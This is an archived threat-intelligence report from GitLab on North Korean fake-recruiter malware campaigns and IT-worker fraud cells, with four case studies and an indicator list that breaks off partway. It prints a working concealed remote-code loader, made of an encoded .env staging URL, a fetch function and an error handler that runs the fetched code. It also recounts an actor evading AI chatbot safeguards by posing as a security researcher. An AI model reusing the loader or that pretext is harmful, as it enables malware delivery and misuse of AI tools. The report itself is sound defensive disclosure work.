{
	"id": "8d3e7cec-e00b-4f44-85b0-dbb3301d4d7b",
	"created_at": "2026-04-06T00:22:15.23772Z",
	"updated_at": "2026-04-10T13:12:11.884671Z",
	"deleted_at": null,
	"sha1_hash": "6190986342b844c6e7130019191deac5190dee64",
	"title": "GitLab Threat Intelligence Team reveals North Korean tradecraft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4014273,
	"plain_text": "GitLab Threat Intelligence Team reveals North Korean tradecraft\r\nBy Oliver Smith\r\nPublished: 2026-02-19 · Archived: 2026-04-05 23:46:37 UTC\r\nWe’re sharing intelligence on threat actors associated with North Korean Contagious Interview and IT worker campaigns to\r\nraise awareness of emerging trends in operations and tradecraft. We hope this analysis helps the broader security community\r\ndefend against evolving threats and address the industry-wide challenge of threat actors using legitimate platforms and tools\r\nfor their operations. Publishing this intelligence reflects our commitment to disrupting threat actor infrastructure. Our\r\nsecurity team continuously monitors for accounts that violate our platform’s terms of use and maintains controls designed to\r\nprevent the creation of accounts from U.S.-embargoed countries in accordance with applicable trade control laws.\r\nThere is no action needed by GitLab customers and GitLab remains secure.\r\nExecutive summary\r\nWhat is Contagious Interview?\r\nSince at least 2022, North Korean nation-state threat actors have posed as recruiters to induce software developers to\r\nexecute malicious code projects under the pretense of technical interviews. Malicious projects execute custom malware,\r\nallowing threat actors to steal credentials and remotely control devices, enabling financial and identity theft and lateral\r\nmovement. This malware distribution campaign has impacted thousands of developers and is tracked in industry research as\r\nContagious Interview.\r\nAbout the report\r\nIn 2025, GitLab identified and banned accounts created by North Korean threat actors used for Contagious Interview.\r\nGitLab’s visibility into these actors' code repositories provides unique, real-time intelligence into the infrastructure powering\r\ncampaign activity. In some instances, we can leverage this insight to identify private GitLab.com projects created and used\r\nby North Korean nation-state threat actors. Some private projects contain malware development artifacts powering North\r\nKorean nation-state malware campaigns. Other projects contain records and notes or software capabilities that support North\r\nKorean sanctions evasion and revenue generation through IT worker activity.\r\nExposing this activity discourages future attempts by these actors to create GitLab accounts and offers insights other\r\norganizations can use to enhance their own defenses.\r\nThis report contains a Year in Review summarizing activity from North Korean nation-state actors that used GitLab.com for\r\ntheir operations in 2025, including a campaign-level view into malware infrastructure and technique trends. The report also\r\nincludes case studies analyzing:\r\nFinancial records maintained by the manager of a North Korean IT worker cell, detailing proceeds from 2022 to 2025\r\nA synthetic identity creation pipeline used to create at least 135 personas, automated to generate professional\r\nconnections and contact leads at scale\r\nA North Korean IT worker controlling 21 unique personas and adding their own image to stolen U.S. identity\r\ndocuments\r\nA North Korean IT worker recruiting facilitators and working for U.S. organizations while operating from Moscow,\r\nRussia\r\nWe’re also sharing more than 600 indicators of compromise associated with these case studies, which can be found in the\r\nAppendix.\r\nYear in Review\r\nNorth Korean nation-state malware activity accelerated in the second half of 2025 and peaked in September. We banned an\r\naverage of 11 accounts per month for distributing North Korean nation-state malware or loaders. We assess that North\r\nKorean nation-state malware activity on GitLab.com almost certainly relates to distinct teams operating in parallel based on\r\nbranching distribution and obfuscation techniques, infrastructure, and malware variants.\r\nKey findings\r\nHere are our key findings, including 2025 campaign trends and malicious code project features.\r\n2025 campaign trends\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 1 of 48\n\nIn 2025, we banned 131 unique accounts distributing malicious code projects we attribute to North Korean nation-state\r\nthreat actors. We identified malicious projects through a combination of proactive detection and user reports. In every\r\ninstance, threat actors used primarily JavaScript codebases. Malicious repositories executed JavaScript-based malware\r\nfamilies tracked publicly as BeaverTail and Ottercookie in more than 95% of cases, however we also observed the\r\ndistribution of lower prevalence payloads, including the compiled ClickFix BeaverTail variant we identified in September.\r\nThreat actors typically originated from consumer VPNs when interacting with GitLab.com to distribute malware; however\r\nthey also intermittently originated from dedicated VPS infrastructure and likely laptop farm IP addresses. Threat actors\r\ncreated accounts using Gmail email addresses in almost 90% of cases. We observed custom email domains in only five\r\ncases, all relating to organizations we assess are likely front companies controlled by North Korean threat actors. Based on\r\nproject composition, threat actors most commonly targeted developers seeking employment in the cryptocurrency, finance,\r\nand real estate sectors. Threat actors also targeted developers in sectors, including artificial intelligence and gaming, at a low\r\nrate.\r\nIn more than 80% of instances, threat actors did not store malware payloads on GitLab.com, instead storing a concealed\r\nloader intended to source and execute remote content. Threat actors abused at least six legitimate services to host malware\r\npayloads, most commonly Vercel. Threat actors also used custom domains to host malware payloads at least 10 times in\r\n2025.\r\nDistribution of staging infrastructure used in North Korean nation-state malware activity on GitLab.com in 2025.\r\nWe observed diverse project structures and a gradual evolution of concealment techniques through 2025. In nine instances,\r\nthreat actors used malicious NPM dependencies created immediately prior to their use in malicious projects. In December,\r\nwe observed a cluster of projects executing malware via VS Code tasks, either piping remote content to a native shell or\r\nexecuting a custom script to decode malware from binary data in a fake font file.\r\nDistribution of features in North Korean nation-state malware projects activity on GitLab.com in 2025.\r\nMalicious code project features\r\nThe most common execution pattern we observed in 2025 had the following features:\r\nA base64 encoded next-stage URL, header key, and header value, all masquerading as benign variables in a .env file.\r\nA trigger function intended to source remote content and raise an error.\r\nA global invocation of the trigger function in a file executed as soon as the project is run.\r\nA custom error handler intended to execute remote content from the trigger function by using\r\nFunction.constructor to load a string as executable code.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 2 of 48\n\nExample excerpt from a .env file containing malicious encoded variables:\r\n # Runtime Configuration\r\nRUNTIME_CONFIG_API_KEY=aHR0cHM6Ly9hcGktc2VydmVyLW1vY2hhLnZlcmNlbC5hcHAvYXBpL2lwY2hlY2stZW5jcnlwdGVkLzgyMw\r\nRUNTIME_CONFIG_ACCESS_KEY=eC1zZWNyZXQtaGVhZGVy\r\nRUNTIME_CONFIG_ACCESS_VALUE=c2VjcmV0\r\n \r\nDecoded values from the .env file (defanged):\r\n # Runtime Configuration\r\nRUNTIME_CONFIG_API_KEY=hxxps[:]//api-server-mocha.vercel[.]app/api/ipcheck-encrypted/823\r\nRUNTIME_CONFIG_ACCESS_KEY=x-secret-header\r\nRUNTIME_CONFIG_ACCESS_VALUE=secret\r\n \r\nExample trigger function intended to source remote content from the concealed staging URL and trigger the custom\r\nerror handler:\r\n const errorTimeHandler = async () =\u003e {\r\n try {\r\n const src = atob(process.env.RUNTIME_CONFIG_API_KEY);\r\n const k = atob(process.env.RUNTIME_CONFIG_ACCESS_KEY);\r\n const v = atob(process.env.RUNTIME_CONFIG_ACCESS_VALUE);\r\n try {\r\n globalConfig = (await axios.get(`${src}`, {\r\n headers: {\r\n [k]: v\r\n }\r\n }));\r\n log('Runtime config loaded successfully.');\r\n } catch (error) {\r\n errorHandler(error.response?.data || error.message);\r\n }\r\n } catch (err) {\r\n await errorHandler(err.response?.data || err.message || err);\r\n }\r\n};\r\n \r\nExample custom error handler intended to execute remote code:\r\n const errorHandler = (error) =\u003e {\r\n try {\r\n if (typeof error !== 'string') {\r\n sss\r\n console.error('Invalid error format. Expected a string.');\r\n return;\r\n }\r\n const createHandler = (errCode) =\u003e {\r\n try {\r\n const handler = new(Function.constructor)('require', errCode);\r\n return handler;\r\n } catch (e) {\r\n console.error('Failed:', e.message);\r\n return null;\r\n }\r\n };\r\n const handlerFunc = createHandler(error);\r\n if (handlerFunc) {\r\n handlerFunc(require);\r\n } else {\r\n console.error('Handler function is not available.');\r\n }\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 3 of 48\n\n} catch (globalError) {\r\n console.error('Unexpected error inside errorHandler:', globalError.message);\r\n }\r\n};\r\n \r\nThe error handler execution pattern allows threat actors to spread malicious components across up to four files and follows a\r\ncode path targets may miss even if they audit code before running it. Staging URLs commonly respond with decoy content\r\nunless the correct header values are included with requests. This technique became increasingly common through 2025,\r\nalongside other anti-analysis developments, including sandbox detection in Ottercookie and the increasing use of invite-only\r\nprivate projects.\r\nThe extent to which distinctive subgroups of activity overlap in time leads us to assess that North Korean nation-state\r\nmalware distribution on GitLab.com almost certainly relates to distinct teams operating in parallel with limited coordination.\r\nWe’ve observed instances consistent with individual operators independently trying to fix an execution issue or add a feature\r\nto their malware. We also observed instances where threat actors have more than one malware execution pathway in a\r\nmalicious repository, potentially resulting in malware executing twice or more. These instances suggest low technical\r\nproficiency among some operators, who appear to lack confidence when modifying malware code.\r\nOther notable observations\r\nIn July 2025, we identified a project containing notes kept by a North Korean nation-state malware distributor. The threat\r\nactor maintained a target list containing more than 1,000 individuals' names. Comments added by the threat actor identify\r\n209 individuals having responded to contact attempts, 88 of whom were recorded as having executed a malicious project.\r\nThis operator also maintained documents and code related to contract software development, suggesting simultaneous\r\nengagement in both malware distribution and fraudulent employment.\r\nIn September 2025, we observed a North Korean nation-state malware developer using AI to help develop a custom\r\nobfuscator for BeaverTail. Based on commit messages and project data, the developer used ChatGPT and Cursor (with an\r\nunknown model) to refine their obfuscator by testing whether AI was capable of de-obfuscating their code. Based on AI\r\nmodel responses, the threat actor was able to avoid triggering safeguards by posing as a security researcher attempting to\r\nanalyze the malware. This demonstrates the broadly empowering nature of AI and the limits of safeguards in preventing use\r\nby motivated threat actors. We have not observed the BeaverTail variant the threat actor created in the wild.\r\nIn October 2025, a North Korean nation-state-controlled account submitted a support ticket to appeal a ban from\r\nGitLab.com for malware distribution. The threat actor, posing as the CTO of a newly created cryptocurrency organization,\r\ninquired about the reason for their ban and requested account reinstatement. We assess that this support ticket was likely an\r\nattempt to gather information about our detection methodology. We provided no information to the threat actor and also\r\nbanned a subsequent account they created using the same CTO persona.\r\nImplications\r\nNorth Korean nation-state malware operations are atypical because of how much direct human effort is involved. The\r\nvolume of manual effort by many operators presents a challenge to service providers because of the extreme diversity in\r\ntechniques that emerges.\r\nWe observed an increasing emphasis on obfuscation and evasiveness in the second half of 2025, indicating that service\r\nprovider disruptions are forcing an evolution in tactics. Despite this, we anticipate that North Korean nation-state malware\r\ncampaigns will continue through 2026 due to the continued effectiveness of the campaign and the high value of developer\r\nendpoints to North Korean threat actors.\r\nMitigation\r\nWe banned 131 accounts associated with North Korean nation-state malware distribution in 2025. We’re grateful for the\r\nabuse reports we received from GitLab.com users, which helped us to track threat actors through infrastructure and\r\ntechnique shifts. We encourage GitLab.com users encountering malicious or suspicious content to continue to submit abuse\r\nreports using the abuse report functionality on user profile pages.\r\nWe improved our data collection and clustering of North Korean nation-state accounts and invested in new capabilities to\r\nidentify threat actor infrastructure. We collaborated with industry partners to share our data, enabling the disruption of\r\naccounts on other platforms.\r\nCase studies\r\nCase Study 1: North Korean IT Worker Cell Manager Financial and Administrative Records\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 4 of 48\n\nSummary\r\nWe identified a private project almost certainly controlled by Kil-Nam Kang (강길남), a North Korean national managing a\r\nNorth Korean IT worker cell. Kang maintained detailed financial and personnel records showing earnings of more than\r\nUS$1.64 million between Q1 2022 and Q3 2025. Kang’s cell currently includes seven other North Korean nationals and\r\ngenerates revenue through freelance software development under false identities. We assess that the cell is highly likely\r\ncolocated and operating from Beijing, China.\r\nKey findings\r\nIn late 2025, we identified a private project containing financial records and administrative documents related to the\r\noperation of a North Korean IT worker cell. Detailed financial records span from Q1 2022 to Q3 2025, however less detailed\r\nrecords indicate the cell was operating as early as 2019.\r\nWe assess that the project is almost certainly controlled by North Korean national Kil-Nam Kang. Records indicate that\r\nKang managed the cell as two subteams in 2022, however from 2023 onwards only tracked performance at the individual\r\nlevel. Kang maintains detailed personnel records, including dossiers on each team member, performance reviews, and copies\r\nof team members’ passports. Kang also has credentials to remotely access each cell member's workstation.\r\nAssessed organization chart of the North Korean IT worker cell managed by Kil-Nam Kang.\r\nPersonnel dossiers list each of the cell members as “베이징주재 김일성종합대학 공동연구중심 연구사”, translating to\r\n“Researcher at Kim Il-sung University Joint Research Center in Beijing”. This designation suggests that the cell’s presence\r\nin China may be under an academic pretext. Kang generally accessed GitLab.com via Astrill VPN, however we also\r\nobserved origination from China Unicom IP addresses geolocated to Beijing, most recently 111.197.183.74 .\r\nDossiers list devices and accounts owned by each cell member, including passwords to access accounts. Dossiers list from\r\ntwo to four “대방관계” (“bilateral relations”) for each cell member. We assess that these bilateral relations almost certainly\r\ninclude active facilitators, however may also include inadvertent facilitators or victims of identity theft. Bilateral relations\r\nspan countries including the U.S., Canada, Mexico, Panama, the U.K., France, Spain, Sweden, Montenegro, Russia, China,\r\nThailand, Indonesia, Malaysia, Philippines, Sri Lanka, Argentina, Chile, and Peru. The project contains other data on\r\nbilateral relations, including identity documents, banking information, and credentials to remotely access devices and\r\naccounts.\r\nFinancial records indicate that the cell generates revenue through freelance and contract software development services. The\r\ncell maintains detailed notes linking each software development project to a facilitator persona. These notes include samples\r\nof communication styles and notes on facilitator circumstances and temperaments to enable cell members to switch between\r\nprojects if required. The cell focused on web and mobile app development.\r\nSoftware development clients pay the cell via digital payment processors. Withdrawal receipts indicate that cell members\r\nwithdraw funds from payment platforms into Chinese banks. The cell maintained organized banking records, including\r\ndigital images of Chinese Resident Identity Cards, which are required to access the Chinese financial system. The cell\r\nmaintained individual records for at least three Chinese banks. One Chinese Resident Identity Card relates to a North\r\nKorean national who is not a member of the cell.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 5 of 48\n\nScreenshot of project spreadsheet showing deposits and withdrawal from virtual bank accounts, dated November 2025.\r\nClient \u0026 financial organization names redacted.\r\nScreenshot of spreadsheet tracking withdrawals from digital payment processors to Chinese bank accounts.\r\nThe project contained more than 120 spreadsheets, presentations, and documents that systematically track quarterly income\r\nperformance for individual team members. Reports compare team member earnings against predefined targets and quarter-over-quarter performance. The comprehensiveness and highly structured nature of financial reports is indicative of regular\r\nfinancial monitoring and reporting to leadership.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 6 of 48\n\nScreenshot of presentation showing cell performance data for Q3 2025.\r\nScreenshot of presentation showing cell member performance relative to goals for Q3 2025.\r\nScreenshot of presentation showing cell performance data by month for Q3 2025.\r\nWe aggregated financial data and identified a total reported income of US$1.64 million from Q1 2022 to Q3 2025. The cell\r\nhad a target of US$1.88 million over the same period. The cell averaged approximately US$117,000 per quarter,\r\napproximately US$14,000 per member excluding Kang. The cell produced the highest earnings in the first half of 2022 and\r\nlowest earnings in Q3 2025.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 7 of 48\n\nActual and target cell earnings over time, 2022 to 2025.\r\nWe assess that cell income goals were likely set based on a combination of prior earnings and cell membership. In Q3 2025,\r\ncell member Won-Jin Kim was dropped from tracking and his documentation was shifted to a directory marked “귀국”\r\n(“Return to the home country”). We assess that Won-Jin Kim’s departure from the cell is unlikely to relate to revenue\r\ngeneration performance based on consistently high earnings relative to other members.\r\nThe private project also contained performance reviews for cell members, dated 2020. These performance reviews confirm\r\nthat the cell is physically colocated and include commentary about cell members’:\r\nEarnings contribution and mutual skills development.\r\nVoluntary donations for Typhoon Bavi and COVID-19 recovery in North Korea.\r\nContributions to collective household duties, including doing laundry, providing haircuts, and purchasing shared food\r\nand drink.\r\nInterpersonal values and adherence to party values.\r\nThese reviews suggest that the cell operates as a tightly controlled collective household where individual performance\r\nencompasses both revenue generation and ideological conformity. We observed instances of a cell member communicating\r\nwith an unknown party by continually overwriting an HTML comment hidden in a large decoy codebase. The other party\r\nappeared to be able to communicate with North Korea, and provided the cell member with information about personal\r\nmatters and the international movements of mutual contacts. This communication method was unique to this exchange and\r\nmay have been an attempt by the cell member to evade surveillance by their superiors.\r\nCommit showing a cell member communicating with an unknown party to pass on messages from inside North Korea.\r\nImplications\r\nThis activity provides a unique view into the financial operations and organizational structure of a North Korean IT worker\r\ncell. Records demonstrate that these operations function as structured enterprises with defined targets and operating\r\nprocedures and close hierarchical oversight. This cell’s demonstrated ability to cultivate facilitators globally provides a high\r\ndegree of operational resiliency and money laundering flexibility.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 8 of 48\n\nThe declining earnings trend through 2025 may reflect a changing landscape due to increased public awareness of North\r\nKorean IT worker activities. Despite this decline, the cell had earnings exceeding US$11,000 per member in Q3 2025,\r\ndemonstrating a clear capability to generate funds for the regime.\r\nMitigations\r\nWe banned accounts related to this activity.\r\nCase Study 2: Synthetic Identity Creation and Service Abuse at Scale\r\nSummary\r\nWe identified a North Korean nation-state software development team collaborating on a large-scale synthetic identity\r\ncreation capability. The capability included functionality to scrape images and personal data, generate fake passports, and\r\nautomate email and professional networking accounts to generate leads. The threat actors also developed tools to\r\nsynchronize Git repositories and created copies of proprietary code they gained access to. This activity cluster created a\r\nminimum of 135 synthetic identities purporting to originate from Eastern Europe and Southeast Asia. Using these personas,\r\nthe actor gained access to at least 48 private codebases.\r\nKey findings\r\nWe identified a set of projects contributed to by a North Korean nation-state activity cluster focused on capability\r\ndevelopment and large scale synthetic identity creation. The cluster included 10 distinct GitLab accounts or Git identities\r\nthat exhibited concurrent activity or had distinct origins, leading us to assess that the activity cluster highly likely comprised\r\nat least a small team of developers. Accounts commonly originated from Virtual Private Servers but intermittently originated\r\nfrom Russian IP space. The development team commenced activities in 2021 but was most active from late-2024 to mid-2025.\r\nThe threat actor developed a complex multistage process to generate synthetic identities at scale. The overall flow of the\r\nthreat actor’s identity creation capability was to:\r\n1. Scrape photographs from social media, AI image generators, and other platforms.\r\n2. Use the legitimate faceswapper.ai service to create novel images by swapping faces from diverse source images into\r\nheadshot-style images suitable for identity documents.\r\n3. Generate passports with fake personal information using VerifTools and newly created headshots. VerifTools is an\r\nillicit fraudulent identity document service disrupted by U.S. authorities in August 2025. Downloaded passports\r\ncontained watermarks because the threat actor did not pay for VerifTools.\r\n4. Use an automated Adobe Photoshop routine stored in a .atn file to extract and remove VerifTools watermarks.\r\n5. Create accounts on email and professional networking sites. The threat actor used fake passports to seek enhanced\r\nidentity verification on professional networking sites.\r\nThe threat actor’s tooling to interact with abused services was brokered through a control node hosted at 185.92.220.208 .\r\nThis control node served a custom API that allowed individual operators to remotely create, monitor, and control individual\r\naccounts. The threat actor used web browsers instrumented with Selenium to interact with abused services. The threat actor\r\nprimarily automated accounts to make connections and cold contact leads to generate software engineering work.\r\nThe threat actor used a combination of dedicated, IPRoyal, and open proxies to obfuscate their activities and stored a\r\nmassive volume of solutions to animal/object matching CAPTCHA challenges to facilitate bypasses in automated scripts.\r\nThe control node tracked the efficacy of the threat actor’s accounts, contact scripts, and infrastructure, allowing the threat\r\nactor to monitor campaign effectiveness and adapt its techniques over time through an administrative dashboard.\r\nThe threat actor stored working data on dedicated infrastructure or in cloud storage accounts rather than on GitLab.com.\r\nHowever, in September 2024, the threat actor inadvertently committed a dump of its database to GitLab.com. The database\r\ncontained records of profiles controlled at that time, which was early in the development of the capability. The contents of\r\nsome fields in the database were encrypted, however the server-side decryption routine code stored on GitLab.com\r\ncontained a hard-coded key, allowing us to decrypt the data.\r\nAs of September 2024, the threat actor controlled 135 synthetic identities. Identities most commonly purported to be based\r\nin Serbia, but also purportedly originated from Poland, Philippines, Indonesia, Bulgaria, Croatia, Romania, Lithuania,\r\nMoldova, Hungary, and Slovakia. For each account, the threat actor stored information about whether identity verification\r\nwas successful, with overall results indicating the threat actor was successful in just over 40% of verification attempts.\r\nCommit volume on the synthetic identity capability escalated sharply from September 2024 to December 2024, indicating\r\nthat the true scale of the threat actor’s activities may have been much higher. The threat actor also had more than 73,000\r\nleads stored in its database dump, providing insight into the scope of its outbound activities.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 9 of 48\n\nThe threat actor also created a set of command line tools for standardized Git operations. The tooling was primarily intended\r\nto allow the threat actor to mirror Git repositories from private namespaces on a range of cloud and self-managed source\r\ncode management systems. The tooling allowed the threat actor to push commits to the mirror and then have them\r\nsynchronized to remote repositories under the correct Git identities. This capability gave the threat actor a safety net against\r\nmaking commits under the wrong identity and also meant that they exfiltrated copies of codebases they gained access to.\r\nBased on metadata reports committed to GitLab.com by the threat actor, they used this mirroring tooling on at least 48\r\nunique repositories.\r\nImplications\r\nThis cluster is notable among North Korean nation-state activity we observed in 2025 due to the strong focus on automation\r\nand continued efficacy monitoring. This cluster also demonstrates that North Korean nation-state threat actors draw on both\r\nemerging AI capabilities and the cybercrime ecosystem to enhance their operations.\r\nIdentity development is a fundamental element of North Korean nation-state insider activity. North Korean nation-state\r\nthreat actors incrementally build legitimacy through identities spanning multiple platforms and by seeking enhanced\r\nverification services where possible. North Korean nation-state identity cultivation draws on network effects by creating\r\ninteractions, reviews and testimonials between personas. These tactics have the drawback of increasing threat actors’\r\nexposure to service provider takedowns. Organizations should treat applications with dead links to professional profiles and\r\nsource code portfolios as highly suspicious.\r\nMitigations\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 10 of 48\n\nWe banned the accounts associated with this activity and notified impacted service providers of potential abuse of their\r\nplatforms.\r\nCase Study 3: North Korean Operator Controlling 21 Personas\r\nSummary\r\nWe identified an individual North Korean operator controlling at least 21 distinct personas based on real identities. The\r\nthreat actor was focused on revenue generation through contract and freelance software development. The threat actor’s\r\npersonas spanned five countries and were supported by doctored identity documents and personal information obtained from\r\nopen sources and through a likely cyber intrusion.\r\nKey findings\r\nWe identified a code project used by an individual North Korean operator active from at least May 2021 until February\r\n2025. The threat actor was focused on generating revenue through contract and freelance software development under a\r\nrange of stolen or shared identities, spanning at least 21 distinct personas. The threat actor focused on web, blockchain, and\r\ncloud skill sets, and created blogs and professional social media accounts on various external platforms. The threat actor\r\ntypically accessed GitLab.com via commercial VPNs and Virtual Private Servers with RDP enabled. Based on lapses in\r\nproxy use, the threat actor was likely physically located in Russia during early 2025.\r\nThe threat actor maintained individual directories for each identity, containing identity documents, resumes, signatures,\r\npersonal information, and payment card information. The threat actor’s identities spanned the U.S., Canada, Ukraine,\r\nEstonia, and Macedonia. For five of their eight U.S.-based identities, the threat actor used Photoshop to edit their own image\r\ninto one or more stolen identity documents, preserving otherwise valid details. The threat actor produced false Florida and\r\nTexas driver licenses and false U.S. passports. The threat actor had Photoshop Document (PSD) template files to produce\r\nidentity documents for Australia, Austria, Canada, Finland, Germany, Malaysia, Mexico, Philippines, and Poland. We\r\nidentified some of these template files for sale via illicit services online and assess that the threat actor likely purchased the\r\ntemplates.\r\nDoctored U.S. identity documents containing the threat actor’s photograph.\r\nThe threat actor also collected personal information on U.S.-based individuals. The threat actor had files that appear to have\r\nbeen exported from the HR management system of a large U.S.-based hospitality company. The files contained information\r\nincluding personal and contact details, protected class status, and identity document numbers for almost 8,000 employees of\r\nthe organization. We were unable to locate this data in circulation or data breach aggregators, suggesting that the data may\r\nhave been obtained by the threat actor during an intrusion or purchased in a one-off sale. The threat actor also had an export\r\nof the public Florida voter registration database, which is one of the most detailed publicly available voter databases.\r\nImplications\r\nThis threat actor’s activities suggest that North Korean threat actors place a particular value on U.S. identities. We identified\r\nno evidence that the threat actor altered non-U.S. identity documents or collected personal data from any other country. This\r\nactivity also demonstrates that North Korean threat actors, even when focused on earning wages, present a cyber intrusion\r\nrisk and actively leverage the cybercrime ecosystem to support their operations.\r\nMitigation\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 11 of 48\n\nWe banned the account associated with this operator.\r\nCase Study 4: North Korean Fake IT Worker Operating from Central Moscow\r\nSummary\r\nWe identified a private code repository used by a North Korean fake IT worker likely operating from central Moscow. The\r\nthreat actor was focused on cultivation of a smaller group of more detailed personas and progressed from freelance work to\r\nfull-time employment. The threat actor also attempted to recruit remote facilitators to maintain custody of laptops intended\r\nto be remotely accessed.\r\nKey findings\r\nWe identified a private code project controlled by a North Korean fake IT worker most recently active in December 2025.\r\nWe identified the project within a week of its creation, however the threat actor's records indicate they have been active on\r\nother platforms since at least 2022. The threat actor started as a freelance software developer and 3D modeler but shifted\r\nfocus to seeking fraudulent full-time employment in 2025. The threat actor’s strategy relied on a smaller number of personas\r\nwith emphasis on establishing legitimacy through backstopping rather than relying on many disposable personas.\r\nRepository contents indicate that the threat actor began as a fraudulent freelancer. Invoices created by the threat actor during\r\nthis period were marked payable to individuals and addresses in China, Poland, and Spain. Documents stored by the threat\r\nactor indicate that they rotated through accounts on at least three payment processors to receive payments from clients. A\r\nspreadsheet stored by the threat actor indicates they were part of a 14-member cell in 2022, however they did not store\r\ncontinuous financial records on GitLab.com. North Korean cells we have observed on GitLab.com typically have smaller\r\nmembership and this is the only data we have observed consistent with a cell membership exceeding 10.\r\nIn early 2025, the threat actor pivoted to attempting to obtain full-time employment at U.S. and U.K. organizations. In\r\nMarch 2025, the threat actor uploaded chat logs to GitLab.com containing exchanges with another likely North Korean\r\noperator. The threat actors discussed their progress in recruiting individuals in the U.S. and U.K. to maintain custody of\r\nlaptops to be remotely accessed in exchange for a fixed fee and the payment of power and internet utilities. The primary\r\nthreat actor mentioned having a current facilitator based in Hong Kong providing remote access to a device and sharing their\r\nidentity and a potential facilitator in the U.K. The primary threat actor represented himself as a Chinese national with visa\r\ndifficulties when attempting to recruit facilitators.\r\nIn April 2025, the threat actor operationalized the Hong Kong-based facilitator and started seeking employment. The threat\r\nactor circulated a set of resumes with different skill sets on resume-sharing sites and on a personal portfolio website. The\r\nthreat actor took a series of photographs of themselves and used several AI-headshot services to create professional profile\r\nphotos.\r\nOriginal and AI-enhanced images of the threat actor stored in private projects and open-source examples claiming\r\nemployment at two U.S.-based organizations.\r\nThe threat actor uploaded the original images used to create their AI headshots to GitLab.com. The images contained EXIF\r\nmetadata, including GPS coordinate data. GPS coordinates stored on the images indicate that they were taken at\r\n55°43'44.4\"N 37°36'55.8\"E , which is a location in the Yakimanka District in central Moscow. We note that these\r\ncoordinates were highly likely produced via Windows location services based on WiFi positioning and may have a reduced\r\naccuracy compared to true GPS. Despite this limitation, we assess that it is highly likely that this threat actor was based in\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 12 of 48\n\nMoscow when the images were captured on April 18, 2025. The threat actor also commonly originated from Russian IP\r\naddresses when accessing GitLab.com without a VPN.\r\nMap depicting the location stored in EXIF metadata on images of the threat actor.\r\nThe threat actor’s notes indicate that they gained employment with at least one small U.S.-based technology agency in mid-2025 and were subsequently contracted to five other organizations. The threat actor appears to have gained significant access\r\nto the agency, including privileged access to web hosts used for client projects and potential access to an executive’s Slack\r\naccount. The threat actor stored copies of the executive’s resume and message logs indicating that the threat actor may\r\nrepresent themselves as the executive in communications with external parties. We are unable to assess whether this is an\r\ninstance of facilitation or the threat actor using their foothold to establish deeper control of the agency.\r\nImplications\r\nThis incident is an example of a North Korean fake IT worker cultivating a small number of detailed personas. This\r\napproach is distinct from other operators that focus on a higher volume of disposable personas.\r\nThis incident also provides insight into North Korean facilitator cultivation. The threat actors were content to seek purely\r\ntechnical facilitators rather than facilitators willing to share their identities and participate in meetings. This preference\r\nsuggests that North Korean operators prioritize circumventing technical controls such as IP address-based geolocation and\r\nreputation scoring over identity verification challenges, indicating that technical controls may be a more significant\r\noperational barrier in the current landscape.\r\nMitigations\r\nWe banned the account associated with this activity.\r\nSaksham Anand contributed to this report.\r\nAppendix 1: GitLab Threat Intelligence Estimative Language\r\nWe use specific language to convey the estimated probability attached to assessments. We also use words including\r\n\"possible\" and \"may\" in circumstances where we are unable to provide a specific estimate. Further reading on estimative\r\nlanguage is available here.\r\nEstimative\r\nTerm\r\nAlmost\r\nCertainly Not\r\nHighly\r\nUnlikely\r\nUnlikely\r\nReal\r\nChance\r\nLikely\r\nHighly\r\nLikely\r\nAlmost\r\nCertain\r\nProbability\r\nRange\r\n0 - 10% 10 - 25%\r\n25 -\r\n40%\r\n40 - 60%\r\n60 -\r\n75%\r\n75 - 90% 90 - 100%\r\nAppendix 2: Indicators of Compromise\r\nWe recommend that organizations use these indicators of compromise as a basis for investigation rather than as a blocklist.\r\nNorth Korean threat actors almost certainly use compromised and purchased identities to support their operations, meaning\r\nthese indicators of compromise may not be uniquely malicious or may have reverted to their original owners. We have made\r\nour best efforts to filter for email addresses where threat actors have indicated positive control of the email address on one or\r\nmore platforms or represented themselves as the associated identity.\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 13 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\naleks.moleski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\naleksander.malinowski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nanatol.baranski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nanton.plonski@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nben.moore0622@outlook.com email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nedward.harley@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\niwan.banicki@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\njohnwilson0825@outlook.com email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nkevin.brock@mail.io email malware N/A N/A\r\nUsed for ma\r\ndistribution\r\nfreelance de\r\nplatforms\r\nrichard.francis10@mail.io email malware 